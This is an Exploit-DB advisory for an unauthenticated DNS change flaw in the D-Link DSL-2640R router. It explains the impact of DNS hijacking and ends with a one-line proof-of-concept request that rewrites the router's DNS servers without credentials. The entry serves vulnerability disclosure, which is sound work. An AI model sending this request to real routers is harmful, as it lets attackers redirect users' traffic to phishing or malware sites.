D-Link DSL-2640R - Unauthenticated DNS Change

EDB-ID: 43678
Author: Todor Donev
Published: 2018-01-17
CVE: N/A
Type: Webapps
Platform: Hardware
Vulnerable App: N/A

 # 
# D-Link DSL-2640R Unauthenticated Remote DNS Change Vulnerability
#
# Firmware Version: UK_1.06 Hardware Version: B1
#
# Copyright 2018 (c) Todor Donev <todor.donev at gmail.com>
#
# https://ethical-hacker.org/
# https://facebook.com/ethicalhackerorg/
#
# Description:
# The vulnerability exist in the web interface.
# D-Link's various routers are susceptible to unauthorized DNS change.
# The problem is when entering an invalid / wrong user and password.
#
# ACCORDING TO THE VULNERABILITY DISCOVERER, MORE D-Link
# DEVICES MAY AFFECTED.
#
# Once modified, systems use foreign DNS servers, which are
# usually set up by cybercriminals. Users with vulnerable
# systems or devices who try to access certain sites are
# instead redirected to possibly malicious sites.
#
# Modifying systems' DNS settings allows cybercriminals to
# perform malicious activities like:
#
# o Steering unknowing users to bad sites:
# These sites can be phishing pages that
# spoof well-known sites in order to
# trick users into handing out sensitive
# information.
#
# o Replacing ads on legitimate sites:
# Visiting certain sites can serve users
# with infected systems a different set
# of ads from those whose systems are
# not infected.
#
# o Controlling and redirecting network traffic:
# Users of infected systems may not be granted
# access to download important OS and software
# updates from vendors like Microsoft and from
# their respective security vendors.
#
# o Pushing additional malware:
# Infected systems are more prone to other
# malware infections (e.g., FAKEAV infection).
#
#

Proof of Concept:

http://<TARGET>/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary=<MALICIOUS DNS>&dnsSecondary=<MALICIOUS DNS>

Related Posts